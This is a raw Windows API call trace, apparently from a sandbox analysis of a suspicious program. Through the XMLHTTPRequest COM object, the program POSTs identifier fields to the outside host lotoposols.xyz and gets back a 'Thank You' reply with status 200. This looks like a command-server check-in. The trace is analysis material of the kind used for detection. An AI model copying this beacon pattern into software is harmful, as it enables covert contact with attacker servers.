	[0099.372] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0099.372] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0099.372] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0099.372] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0099.372] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0099.372] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0099.372] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0099.374] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0099.374] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0099.374] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0099.375] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0099.375] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0099.375] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0099.375] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0099.375] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0099.375] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0099.375] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0099.375] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0099.375] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0099.375] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0099.375] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0099.375] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0099.375] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0099.375] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0099.375] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0099.375] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0099.375] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0099.375] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0099.376] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0099.376] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0099.376] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0099.376] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0099.376] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0099.376] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0099.376] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0099.376] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0099.376] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0099.376] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0099.376] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0099.376] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x112f38 | out: ppvObject=0x112f38*=0x0) returned 0x80004002
	[0099.376] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0099.377] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0099.377] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x5a53a68 | out: ppvObject=0x5a53a68*=0x0) returned 0x80004002
	[0099.377] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0109.723] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0109.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0109.723] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0109.723] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0109.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0109.723] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 6767537", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0109.724] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0109.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0109.725] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0109.725] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0109.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0109.725] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0109.725] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0109.725] GetTickCount () returned 0x1152962
	[0109.725] GetTickCount () returned 0x1152962
	[0109.726] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0109.726] malloc (_Size=0xb0) returned 0x42e060
	[0109.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0109.728] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0109.728] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0109.728] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0109.728] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0109.728] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0109.729] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0109.729] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0109.729] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0109.732] longjmp () 
	[0109.732] longjmp () 
	[0109.732] longjmp () 
	[0109.733] GetCurrentThreadId () returned 0x9a8
	[0109.733] GetCurrentThreadId () returned 0x9a8
	[0109.733] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0109.733] malloc (_Size=0x80) returned 0x3c88b0
	[0109.733] longjmp () 
	[0109.733] longjmp () 
	[0109.733] longjmp () 
	[0109.733] longjmp () 
	[0109.734] longjmp () 
	[0109.734] longjmp () 
	[0109.734] longjmp () 
	[0109.734] longjmp () 
	[0109.734] longjmp () 
	[0109.735] GetTickCount () returned 0x1152971
	[0109.735] longjmp () 
	[0109.735] longjmp () 
	[0109.735] longjmp () 
	[0109.735] longjmp () 
	[0109.735] longjmp () 
	[0109.736] longjmp () 
	[0109.736] longjmp () 
	[0109.736] longjmp () 
	[0109.736] longjmp () 
	[0109.736] longjmp () 
	[0109.737] longjmp () 
	[0109.737] longjmp () 
	[0109.737] longjmp () 
	[0109.737] longjmp () 
	[0109.737] longjmp () 
	[0109.738] longjmp () 
	[0109.738] longjmp () 
	[0109.738] longjmp () 
	[0109.738] longjmp () 
	[0109.738] longjmp () 
	[0109.739] longjmp () 
	[0109.739] longjmp () 
	[0109.739] longjmp () 
	[0109.739] longjmp () 
	[0109.739] longjmp () 
	[0109.740] longjmp () 
	[0109.740] longjmp () 
	[0109.740] longjmp () 
	[0109.740] longjmp () 
	[0109.740] longjmp () 
	[0109.740] longjmp () 
	[0109.741] longjmp () 
	[0109.741] GetTickCount () returned 0x1152971
	[0109.741] longjmp () 
	[0109.741] longjmp () 
	[0109.741] longjmp () 
	[0109.741] longjmp () 
	[0109.742] longjmp () 
	[0109.742] longjmp () 
	[0109.742] longjmp () 
	[0109.742] longjmp () 
	[0109.742] longjmp () 
	[0109.742] longjmp () 
	[0109.742] longjmp () 
	[0109.743] longjmp () 
	[0109.743] longjmp () 
	[0109.743] longjmp () 
	[0109.743] longjmp () 
	[0109.743] longjmp () 
	[0109.743] longjmp () 
	[0109.744] longjmp () 
	[0109.744] longjmp () 
	[0109.744] longjmp () 
	[0109.744] longjmp () 
	[0109.744] longjmp () 
	[0109.744] longjmp () 
	[0109.744] longjmp () 
	[0109.745] longjmp () 
	[0109.745] longjmp () 
	[0109.745] longjmp () 
	[0109.745] longjmp () 
	[0109.745] longjmp () 
	[0109.745] longjmp () 
	[0109.746] longjmp () 
	[0109.746] longjmp () 
	[0109.746] GetTickCount () returned 0x1152971
